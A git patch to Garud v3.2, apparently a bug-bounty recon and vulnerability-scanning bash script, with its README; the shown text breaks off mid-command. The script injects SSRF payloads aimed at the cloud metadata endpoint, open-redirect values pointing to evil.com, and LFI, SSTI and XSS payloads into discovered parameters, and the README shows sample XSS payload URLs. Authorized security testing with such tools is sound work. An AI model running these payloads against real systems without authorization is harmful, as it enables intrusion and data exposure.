From 262f48f35930764ffeda1e55d843b78582bc2147 Mon Sep 17 00:00:00 2001 From: R0X4R <32596297+R0X4R@users.noreply.github.com> Date: Thu, 9 Dec 2021 19:14:16 +0530 Subject: [PATCH] garud `v3.2` Fixed some error and added bhedak and some other filters and json output feature --- README.md | 81 ++++++++--- garud | 420 ++++++++++++++++++++++++++++++----------------------- install.sh | 3 + 3 files changed, 300 insertions(+), 204 deletions(-) diff --git a/README.md b/README.md index 5b5c3b0..bd7deca 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ I made this tool to automate my recon and save my time. It really give me headac The script first enumerates all the subdomains of the give target domain using assetfinder, sublister, subfinder and amass then filters all live domains from the whole subdomain list then it extarct titles of the subdomains using httpx then it scans for subdomain takeover using nuclei. Then it uses gauplus to extract paramters of the given subdomains then it use gf patterns to filters xss, ssti, ssrf, sqli params from that given subdomains and then it scans for low hanging fruits as well. Then it'll save all the output in a text file like target-xss.txt. Then it will send the notifications about the scan using notify.
```txt -What's new in v3.0: Fixed some error and added naabu for port scanning and uro for url filtering +What's new in v3.2: Fixed some error and added bhedak and some other filters and json output feature. ```

How garud works

@@ -79,16 +79,20 @@ garud:~ git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x ga [GARUD] - Coded by R0X4R in INDIA with <3 Example Usage: -garud [-d target.tld] [-o output destination] [-t threads] [-b blind xss URL] [-x OOS domains] +garud [-d target.tld] [-o output destination] [-t threads] [-b blind xss URL] [-x OOS domains] [--json] [-s] [-r] Flags: - -b, --blind Add your xss server for BXSS [Default: false] (e.g. -b test.xss.ht) - -d, --domain Add your target (e.g -d target.tld) - -o, --output Write to output folder (e.g -o results/) - -s, --silent Hide output in the terminal [Default: false] - -t, --threads Number of threads [Default: 100] (e.g. -t 300) - -v, --version Print current version of Garud - -x, --exclude Exclude out of scope domains [Default: false] (e.g. -x ~/oosdomains.txt) + -b, --blind string Add your xss server for BXSS -b test.xss.ht + -d, --domain string Add your target -d target.tld + -o, --output string Write to output folder -o results + -t, --threads int Number of threads -t 100 + -x, --exclude string Exclude out of scope domains -x /home/oosd.txt + +Optional Flags: + -s, --silent Hide output in the terminal Default: False + -j, --json Store output in a single json file Default: False + -r, --remove Delete everything except json output Default: False + -v, --version Print current version of Garud ``` **Fix errors while using or installing Garud** @@ -104,35 +108,66 @@ You can also copy the error and search on google this will make your debugging s **Example Usage** -```bash -garud:~ garud -d hackerone.com -o hackerone +```txt +# garud -d hackerone.com -o hackerone ``` Add threads to your scan -```bash -garud:~ garud -d hackerone.com -o hackerone -t 200 +```txt +# garud -d hackerone.com -o hackerone -t 200 ``` Scan for blind xss, you can get your xss server from [`xsshunter.com`](https://xsshunter.com/) -```bash -garud:~ garud -d hackerone.com -o hackerone -b test.xss.ht +```txt +# garud -d hackerone.com -o hackerone -b test.xss.ht ``` Exclude out of scope domains -```bash -garud:~ echo test.hackerone.com > ossdomain.txt -garud:~ garud -d hackerone.com -o hackerone -x ~/ossdomain.txt +```txt +# echo test.hackerone.com > ossdomain.txt +# garud -d hackerone.com -o hackerone -x ~/ossdomain.txt ``` With all flags -```bash -garud:~ garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt +```txt +# garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt ``` Hide output in the terminal -```bash -garud:~ garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt -s +```txt +# garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt -s +``` + +Store output in a single `json` file + +```txt +# garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt -s -j +# cd hackerone +# cat output.json | jq +{ + "nuclei_critical": [], + "vuln_crlf": [], + "dalfox": [ + "[POC][V][GET][inATTR-double(3)-URL] http://subdomain.target.tld/hpp?pp=FUZZ%22onpointerout%3Dconfirm.call%28null%2C1%29+class%3Ddalfox+", + ----------------------snip---------------------- + "subdomains": [ + "sub.target.tld", + "tub.target.tld", + "subdomain.target.tld" + ], + "vuln_xss": [ + "[POTENTIAL XSS] - http://subdomain.target.tld/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", + "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E ", + "[POTENTIAL XSS] - http://subdomain.target.tld:80/hpp/index.php?pp=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E " + ] +} +``` + +Remove everything except some folders and `json` output. + +```txt +# garud -d hackerone.com -o hackerone -t 300 -b test.xss.ht -x ~/ossdomain.txt -s -r ``` Start where you left -```bash +```txt garud:~ garud -d hackerone.com. -o hackerone -t 300 Starting scan... ^C # assume you stopped at nuclei scan diff --git a/garud b/garud index 1d4488f..e799d02 100755 --- a/garud +++ b/garud @@ -1,292 +1,350 @@ -#!/bin/bash +#!/usr/bin/env bash # coded by R0X4R -# Garud - version 3.0 +# Garud - version 3.2 # Contributers: KathanP19 (https://github.com/KathanP19), frost19k (https://github.com/frost19k), f8al (https://github.com/f8al), theamanrawat (https://github.com/theamanrawat), remonsec (https://github.com/remonsec), simrotion13 (https://github.com/simrotion13) -#------------------------------------------------------- -#> Check Connection +#> CHECK CONNECTION wget -q --spider http://google.com if [ $? -ne 0 ];then echo "Connect to internet before running Garud!" - exit 1 + exit 127 fi -#------------------------------------------------------- #> VARIABLES -version="Garud v3.0" +version="Garud v3.2" domain= outdir= exclude= threads= blindxss= silent=False +jsonout=False +remout=False ports="21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" + #> COLORS -red="\e[31m" -bold="\e[1m" -normal="\e[0m" -#------------------------------------------------------- +RED="\e[31m" +GREEN="\e[32m" +BOLD="\e[1m" +NORMAL="\e[0m" #> PRINT USAGE -printUsage(){ - echo -e " " - echo -e "[${bold}GARUD${normal}] - Coded by ${bold}R0X4R${normal} in ${bold}INDIA${normal} with ${red}<3${normal}\n" +printusage(){ + echo -e "" + echo -e "[${BOLD}GARUD${NORMAL}] - Coded by ${BOLD}R0X4R${NORMAL} in ${BOLD}INDIA${NORMAL} with ${RED}<3${NORMAL}\n" echo -e "Example Usage:" - echo -e "garud [-d target.tld] [-o output destination] [-t threads] [-b blind xss URL] [-x OOS domains]\n" + echo -e "garud [-d target.tld] [-o output destination] [-t threads] [-b blind xss URL] [-x OOS domains] [--json] [-s] [-r]" + echo -e "" echo -e "Flags:" - echo -e " -b, --blind Add your xss server for BXSS [Default: false] (e.g. -b test.xss.ht)" - echo -e " -d, --domain Add your target (e.g -d target.tld)" - echo -e " -o, --output Write to output folder (e.g -o results/)" - echo -e " -s, --silent Hide output in the terminal [Default: false]" - echo -e " -t, --threads Number of threads [Default: 100] (e.g. -t 300)" - echo -e " -v, --version Print current version of Garud" - echo -e " -x, --exclude Exclude out of scope domains [Default: false] (e.g. -x ~/oosdomains.txt)" + echo -e " -b, --blind ${GREEN}string${NORMAL} Add your xss server for BXSS -b test.xss.ht" + echo -e " -d, --domain ${GREEN}string${NORMAL} Add your target -d target.tld" + echo -e " -o, --output ${GREEN}string${NORMAL} Write to output folder -o results" + echo -e " -t, --threads ${GREEN}int${NORMAL} Number of threads -t 100" + echo -e " -x, --exclude ${GREEN}string${NORMAL} Exclude out of scope domains -x /home/oosd.txt" + echo -e "" + echo -e "Optional Flags:" + echo -e " -s, --silent Hide output in the terminal ${GREEN}Default: ${RED}False${NORMAL}" + echo -e " -j, --json Store output in a single json file ${GREEN}Default: ${RED}False${NORMAL}" + echo -e " -r, --remove Delete everything except json output ${GREEN}Default: ${RED}False${NORMAL}" + echo -e " -v, --version Print current version of Garud" exit 0 } -#------------------------------------------------------- #> ARGUMENT FLAGS while [ -n "$1" ]; do - case $1 in - -b|--blind) - blindxss=$2 - shift ;; - - -d|--domain) - domain=$2 - shift ;; - - -h|--help) - printUsage - shift ;; + case $1 in + -b|--blind) + blindxss=$2 + shift ;; - -o|--output) - outdir=$2 - shift ;; + -d|--domain) + domain=$2 + shift ;; + + -h|--help) + printusage + shift ;; - -s|--silent) - silent='true' - ;; + -o|--output) + outdir=$2 + shift ;; + + -j|--json) + jsonout='true' + ;; - -t|--threads) - threads=$2 - shift ;; + -s|--silent) + silent='true' + ;; - -x|--exclude) - exclude=$2 - shift ;; - - -v|--version) - echo -e "$version" - exit 0 ;; - - *) - printUsage - esac - shift + -t|--threads) + threads=$2 + shift ;; + + -r|--remove) + remout='true' + shift ;; + + -x|--exclude) + exclude=$2 + shift ;; + + -v|--version) + echo -e "$version" + exit 0 ;; + + *) + printusage + esac + shift done -#------------------------------------------------------- + #> INITIAL CONFIGS if [ -z "$domain" ]; then - echo -e "\n${red}ERROR${normal} - Target not supplied.\n${normal}" - printUsage + echo -e "\n${RED}ERROR${NORMAL} - Target not supplied.\n${NORMAL}" + printusage fi if [ -z "$outdir" ]; then - echo -e "\n${red}ERROR${normal} - Output destination not supplied.\n${normal}" - printUsage + echo -e "\n${RED}ERROR${NORMAL} - Output destination not supplied.\n${NORMAL}" + printusage fi if [ -z "$threads" ]; then threads=100 fi -#------------------------------------------------------- + +if [ "$remout" == "true" ]; then + jsonout='true' +fi + +#> TRAP FUNCTION +trap ctrl_c INT +ctrl_c(){ + echo -e "" + echo -e "${RED}[!] ${NORMAL}KEYBOARD INTERRUPTION, ${GREEN}EXITING GARUD${NORMAL}..." + exit 127 +} mkdir -p $outdir cd $outdir #> BANNER -printBanner(){ +banner(){ clear - echo -e "${red}█▀▀ ▄▀█ █▀█ █░█ █▀▄" - echo -e "█▄█ █▀█ █▀▄ █▄█ █▄▀ v3.0" - echo -e "${normal}${bold}\ncoded by R0X4R in ${red}INDIA${normal}${bold} with ${red}<3${normal}\n" - echo -e "${bold}Time: $(date) Target: $domain Output: $(pwd)${normal}\n" + echo -e "" + echo -e "${RED} \t\t █▀▀ ▄▀█ █▀█ █░█ █▀▄" + echo -e " \t\t █▄█ █▀█ █▀▄ █▄█ █▄▀ v3.2" + echo -e "${NORMAL}${BOLD}\n \t\tcoded by R0X4R in ${RED}INDIA${NORMAL}${BOLD} with ${RED}<3${NORMAL}\n" + echo -e "- TARGET: ${GREEN}$domain${NORMAL} \t - OUTPUT: ${GREEN}$(pwd)${NORMAL}" + echo -e "" echo -e "[Garud] - Scanning started on $domain at $(date)" | notify -silent - sleep 1s } -#------------------------------------------------------- #> MAKE FOLDERS -makeFolders(){ - mkdir -p temporary/ - mkdir -p domains/ - mkdir -p domains/patterns/ - mkdir -p domains/directories/ - mkdir -p injections/ - mkdir -p nuclei/ +makedir(){ + mkdir -p .tmp + mkdir -p domains + mkdir -p domains/patterns + mkdir -p domains/fuzz + mkdir -p injections + mkdir -p nuclei + [ "$jsonout" == "False" ] || mkdir -p .json } -#------------------------------------------------------- #> SUBDOMAIN ENUMERATION -#> This may take sometime -passiveEnum(){ - [ ! -f temporary/crt.txt ] && curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | grep -o "\w.*$domain" | anew -q temporary/crt.txt - [ ! -f temporary/hackertarget.txt ] && curl -s "https://api.hackertarget.com/hostsearch/?q=$domain" | grep -o "\w.*$domain" | anew -q temporary/hackertarget.txt - [ ! -f temporary/riddler.txt ] && curl -s "https://riddler.io/search/exportcsv?q=pld:$domain" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep -o "\w.*$domain" | anew -q temporary/riddler.txt - [ ! -f temporary/assetfinder.txt ] && assetfinder --subs-only $domain | anew -q temporary/assetfinder.txt - [ ! -f temporary/sublister.txt ] && python3 ~/tools/Sublist3r/sublist3r.py -d $domain -o temporary/sublister.txt &> /dev/null - [ ! -f temporary/subfinder.txt ] && subfinder -silent -d $domain -all -t $threads -o temporary/subfinder.txt &> /dev/null - [ ! -f temporary/amass.txt ] && amass enum -passive -d $domain -o temporary/amass.txt &> /dev/null - [ ! -f temporary/crobat.txt ] && crobat -s $domain | anew -q temporary/crobat.txt +passiveenum(){ + [ ! -f ".tmp/crt.txt" ] && curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | grep -o "\w.*$domain" | anew -q .tmp/crt.txt + [ ! -f ".tmp/hackertarget.txt" ] && curl -s "https://api.hackertarget.com/hostsearch/?q=$domain" | grep -o "\w.*$domain" | anew -q .tmp/hackertarget.txt + [ ! -f ".tmp/riddler.txt" ] && curl -s "https://riddler.io/search/exportcsv?q=pld:$domain" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep -o "\w.*$domain" | anew -q .tmp/riddler.txt + [ ! -f ".tmp/assetfinder.txt" ] && assetfinder --subs-only $domain | anew -q .tmp/assetfinder.txt + [ ! -f ".tmp/sublister.txt" ] && python3 ~/tools/Sublist3r/sublist3r.py -d $domain -o .tmp/sublister.txt &> /dev/null + [ ! -f ".tmp/subfinder.txt" ] && subfinder -silent -d $domain -all -t $threads -o .tmp/subfinder.txt &> /dev/null + [ ! -f ".tmp/amass.txt" ] && amass enum -passive -d $domain -o .tmp/amass.txt &> /dev/null + [ ! -f ".tmp/crobat.txt" ] && crobat -s $domain | anew -q .tmp/crobat.txt } -activeEnum(){ - [ ! -f temporary/ffuf.json ] && ffuf -u http://FUZZ.$domain/ -t 100 -p '1.0-2.0' -w ~/wordlists/subdomains.txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -mc 200 -r -o temporary/ffuf.json -s 2> /dev/null &> /dev/null - cat temporary/ffuf.json 2> /dev/null | jq -r '.results[] | .host' 2> /dev/null | anew -q temporary/ffuf.txt - [ ! -f temporary/gobuster.txt ] && gobuster dns -d $domain --no-error -z -q -t 50 -w ~/wordlists/subdomains.txt 2> /dev/null | sed 's/Found: //g' | anew -q temporary/gobuster.txt - [ ! -f temporary/amassact.txt ] && timeout 50m amass enum -active -brute -w ~/wordlists/subdomains.txt -d $domain -o temporary/amassact.txt &> /dev/null +activeenum(){ + [ ! -f ".tmp/ffuf.json" ] && ffuf -u http://FUZZ.$domain/ -t 100 -p '1.0-2.0' -w ~/wordlists/subdomains.txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -mc 200 -r -o .tmp/ffuf.json -s 2> /dev/null &> /dev/null + cat .tmp/ffuf.json 2> /dev/null | jq -r '.results[] | .host' 2> /dev/null | anew -q .tmp/ffuf.txt + [ ! -f ".tmp/gobuster.txt" ] && gobuster dns -d $domain --no-error -z -q -t 50 -w ~/wordlists/subdomains.txt 2> /dev/null | sed 's/Found: //g' | anew -q .tmp/gobuster.txt + [ ! -f ".tmp/amassact.txt" ] && timeout 50m amass enum -active -brute -w ~/wordlists/subdomains.txt -d $domain -o .tmp/amassact.txt &> /dev/null } -secondLevel(){ - cat temporary/*.txt | grep -v "*" | sed '/@\|
\|\_\|*/d' | grep "$domain" | anew -q temporary/domains - [ ! -f temporary/seconddomains.txt ] && xargs -a temporary/domains -P 50 -I % bash -c "assetfinder --subs-only % | anew -q temporary/seconddomains.txt" 2> /dev/null; timeout 30m xargs -a temporary/domains -P 10 -I % bash -c "amass enum -passive -d %" 2> /dev/null | anew -q temporary/seconddomains.txt +secondlevel(){ + cat .tmp/*.txt | grep -v "*" | sed '/@\|
\|\_\|*/d' | grep "$domain" | anew -q .tmp/domains + [ ! -f ".tmp/seconddomains.txt" ] && xargs -a .tmp/domains -P 50 -I % bash -c "assetfinder --subs-only % | anew -q .tmp/seconddomains.txt" 2> /dev/null; timeout 30m xargs -a .tmp/domains -P 10 -I % bash -c "amass enum -passive -d %" 2> /dev/null | anew -q .tmp/seconddomains.txt } -checkDomains(){ +domaincheck(){ #> FILTERING DOMAINS if [ -f "$exclude" ]; then - cat temporary/*.txt | grep -v "*" | grep -vf $exclude | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt + cat .tmp/*.txt | grep -v "*" | grep -vf $exclude | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt else - cat temporary/*.txt | grep -v "*" | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt + cat .tmp/*.txt | grep -v "*" | sort -u | sed '/@\|
\|\_\|*/d' | dnsx -retry 2 -r ~/wordlists/resolvers.txt -t 100 -silent | anew -q domains/subdomains.txt fi + #> WEB PROBING AND SCREENSHOT - [ ! -f domains/ports.txt ] && naabu -retries 2 -r ~/wordlists/resolvers.txt -l domains/subdomains.txt --port $ports -silent -no-color 2> /dev/null | anew -q domains/ports.txt - [ ! -f domains/probes.txt ] && xargs -a domains/ports.txt -P 50 -I % bash -c "echo % | httpx -silent -threads 150 -status-code -title -timeout 20 -retries 2 -follow-host-redirects -random-agent -no-color" 2> /dev/null | anew -q domains/probes.txt + [ "$jsonout" == "False" ] || cat domains/subdomains.txt | python3 -c "import sys; import json; print (json.dumps({'subdomains':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/subdomains.json &> /dev/null + [ ! -f "domains/ports.txt" ] && naabu -retries 2 -r ~/wordlists/resolvers.txt -l domains/subdomains.txt --port $ports -silent -no-color 2> /dev/null | anew -q domains/ports.txt + [ "$jsonout" == "False" ] || cat domains/ports.txt | python3 -c "import sys; import json; print (json.dumps({'ports':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ports.json &> /dev/null + [ ! -f "domains/probes.txt" ] && xargs -a domains/ports.txt -P 50 -I % bash -c "echo % | httpx -silent -threads 150 -status-code -title -timeout 20 -retries 2 -follow-host-redirects -random-agent -no-color" 2> /dev/null | anew -q domains/probes.txt cat domains/probes.txt | awk '{print $1}' 2> /dev/null | anew -q domains/liveurls.txt + [ "$jsonout" == "False" ] || cat domains/liveurls.txt | python3 -c "import sys; import json; print (json.dumps({'liveurls':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/liveurls.json &> /dev/null [ ! -d domains/aquatone ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "echo % | aquatone -chrome-path /snap/bin/chromium -out domains/aquatone/ -threads 10 -silent" 2> /dev/null &> /dev/null } -subEnum(){ - echo -e "${bold}Starting subdomain enumeration of $domain${normal}" - passiveEnum - activeEnum - secondLevel - checkDomains +subenum(){ + echo -e "${BOLD}Starting subdomain enumeration of $domain${NORMAL}" + passiveenum + activeenum + secondlevel + domaincheck [ "$silent" == "False" ] && cat domains/liveurls.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- SUBDOMAINS: $(cat domains/liveurls.txt 2> /dev/null | wc -l)${normal}\n" + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SUBDOMAINS: $(cat domains/liveurls.txt 2> /dev/null | wc -l)${NORMAL}\n" echo -e "[$(date)] - Subdomain enumeration completed, total [Subdomains:$(cat domains/subdomains.txt | wc -l) Activeurls:$(cat domains/liveurls.txt | wc -l)] found" | notify -silent &> /dev/null } -#------------------------------------------------------- #> WEB CRAWLING AND FILTERING -enumCrawl(){ - echo -e "${bold}Crawling subdomains of $domain${normal}" - [ ! -f temporary/gospider.txt ] && timeout 50m gospider -S domains/liveurls.txt -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o temporary/gospider 2> /dev/null | anew -q temporary/gospider.txt - [ ! -f temporary/waybackurls.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q temporary/waybackurls.txt - [ ! -f temporary/gauplus.txt ] && cat domains/liveurls.txt | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t $threads -o temporary/gauplus.txt - # [ ! -f temporary/jslinks.txt ] && cat temporary/gauplus.txt temporary/waybackurls.txt | subjs -c 50 2> /dev/null | parallel -j 20 'echo "{}" | python3 ~/tools/JSA/jsa.py' 2> /dev/null | anew -q temporary/jslinks.txt - cat temporary/gospider.txt temporary/gauplus.txt temporary/waybackurls.txt 2> /dev/null | sed '/\[/d' | grep $domain | sort -u | uro | anew -q domains/endpoints.txt # <-- Filtering duplicate and common endpoints +webcrawl(){ + echo -e "${BOLD}Crawling subdomains of $domain${NORMAL}" + [ ! -f ".tmp/gospider.txt" ] && timeout 50m gospider -S domains/liveurls.txt -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o .tmp/gospider 2> /dev/null | anew -q .tmp/gospider.txt + [ ! -f ".tmp/waybackurls.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q .tmp/waybackurls.txt + [ ! -f ".tmp/gauplus.txt" ] && cat domains/liveurls.txt | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t $threads -o .tmp/gauplus.txt + cat .tmp/gospider.txt .tmp/gauplus.txt .tmp/waybackurls.txt 2> /dev/null | sed '/\[/d' | grep $domain | sort -u | uro | anew -q domains/endpoints.txt # <-- Filtering duplicate and common endpoints + [ "$jsonout" == "False" ] || cat domains/endpoints.txt | python3 -c "import sys; import json; print (json.dumps({'endpoints':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/endpoints.json &> /dev/null + #> FILTERING ENDPOINTS USING PATTERNS - cat domains/endpoints.txt | gf xss | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/xss.txt - cat domains/endpoints.txt | gf ssrf | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/ssrf.txt - cat domains/endpoints.txt | gf ssti | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/ssti.txt - cat domains/endpoints.txt | gf redirect | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/redirect.txt - cat domains/endpoints.txt | gf sqli | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/sqli.txt - cat domains/endpoints.txt | gf lfi | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/lfi.txt - cat domains/endpoints.txt | gf rce | sed "s/'\|(\|)//g" | qsreplace "FUZZ" 2> /dev/null | anew -q domains/patterns/rce.txt - cat ~/tools/payloads/ssti.txt | while read -r line; do cat domains/patterns/ssti.txt | qsreplace "$line" 2> /dev/null | anew -q temporary/ssti.txt;done - cat ~/tools/payloads/lfi.txt | while read -r line; do cat domains/patterns/lfi.txt | qsreplace "$line" 2> /dev/null | anew -q temporary/lfi.txt;done - cat domains/patterns/ssrf.txt | qsreplace "http://169.254.169.254/latest/meta-data/hostname" 2> /dev/null | anew -q temporary/ssrf.txt - xargs -a domains/patterns/xss.txt -P 30 -I % bash -c "echo % | kxss" 2> /dev/null | grep "< >\|\"" | awk '{print $2}' | anew -q temporary/xssp.txt - cat temporary/xssp.txt 2> /dev/null | qsreplace "\">/>" 2> /dev/null | anew -q temporary/xss.txt - cat domains/patterns/redirect.txt | qsreplace "http://www.evil.com/" 2> /dev/null | anew -q temporary/redirect.txt + if [ -s "domains/endpoints.txt" ]; then + gf xss domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/xss.txt + gf lfi domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/lfi.txt + gf rce domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/rce.txt + gf ssrf domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/ssrf.txt + gf ssti domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/ssti.txt + gf sqli domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/sqli.txt + gf redirect domains/endpoints.txt | sed "s/'\|(\|)//g" | bhedak "FUZZ" 2> /dev/null | anew -q domains/patterns/redirect.txt + else + echo -e "[!] - \"domains/endpoints.txt\" file not found or doesn't contain anything" + exit 127 + fi + + if [ -s "~/tools/payloads/ssti.txt" ] && [ -s "~/tools/payloads/lfi.txt" ]; then + cat ~/tools/payloads/ssti.txt | while read -r line; do + cat domains/patterns/ssti.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/ssti.txt + done + + cat ~/tools/payloads/lfi.txt | while read -r line; do + cat domains/patterns/lfi.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/lfi.txt + done + else + wget -O ~/tools/payloads/lfi.txt https://raw.githubusercontent.com/R0X4R/Garud/master/.github/payloads/lfi.txt -q --no-check-certificate + wget -O ~/tools/payloads/ssti.txt https://raw.githubusercontent.com/R0X4R/Garud/master/.github/payloads/ssti.txt -q --no-check-certificate + cat ~/tools/payloads/ssti.txt | while read -r line; do + cat domains/patterns/ssti.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/ssti.txt + done + + cat ~/tools/payloads/lfi.txt | while read -r line; do + cat domains/patterns/lfi.txt | bhedak "$line" 2> /dev/null | anew -q .tmp/lfi.txt + done + fi + + [ -s "domains/patterns/ssrf.txt" ] && cat domains/patterns/ssrf.txt | bhedak "http://169.254.169.254/latest/meta-data/hostname" 2> /dev/null | anew -q .tmp/ssrf.txt + [ -s "domains/patterns/xss.txt" ] && xargs -a domains/patterns/xss.txt -P 30 -I % bash -c "echo % | kxss" 2> /dev/null | grep "< >\|\"" | awk '{print $2}' | anew -q .tmp/xssp.txt + [ -s ".tmp/xssp.txt" ] && cat .tmp/xssp.txt 2> /dev/null | bhedak "\">/>" 2> /dev/null | anew -q .tmp/xss.txt + [ -s "domains/patterns/redirect.txt" ] && cat domains/patterns/redirect.txt | bhedak "http://www.evil.com/" 2> /dev/null | anew -q .tmp/redirect.txt } -#------------------------------------------------------- #> NUCLEI SCAN -nucleiScan(){ - echo -e "${bold}Starting nuclei scan on $domain${normal}" - [ ! -f nuclei/info.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -severity info -c 50 -silent" 2> /dev/null | anew -q nuclei/info.txt - [ ! -f nuclei/low.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -severity low -c 50 -silent" 2> /dev/null | anew nuclei/low.txt | notify -silent &> /dev/null - [ ! -f nuclei/medium.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -severity medium -c 50 -silent" 2> /dev/null | anew nuclei/medium.txt | notify -silent &> /dev/null - [ ! -f nuclei/high.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -severity high -c 50 -silent" 2> /dev/null | anew nuclei/high.txt | notify -silent &> /dev/null - [ ! -f nuclei/critical.txt ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -severity critical -c 50 -silent" 2> /dev/null | anew nuclei/critical.txt | notify -silent &> /dev/null +nucleiscan(){ + echo -e "${BOLD}Starting nuclei scan on $domain${NORMAL}" + nuclei -update-templates 2> /dev/null &> /dev/null + [ ! -f "nuclei/info.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity info -c 50 -silent" 2> /dev/null | anew -q nuclei/info.txt + [ ! -f "nuclei/low.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity low -c 50 -silent" 2> /dev/null | anew nuclei/low.txt | notify -silent &> /dev/null + [ ! -f "nuclei/medium.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity medium -c 50 -silent" 2> /dev/null | anew nuclei/medium.txt | notify -silent &> /dev/null + [ ! -f "nuclei/high.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity high -c 50 -silent" 2> /dev/null | anew nuclei/high.txt | notify -silent &> /dev/null + [ ! -f "nuclei/critical.txt" ] && xargs -a domains/liveurls.txt -P 50 -I % bash -c "nuclei -target % -t ~/nuclei-templates/ -nc -severity 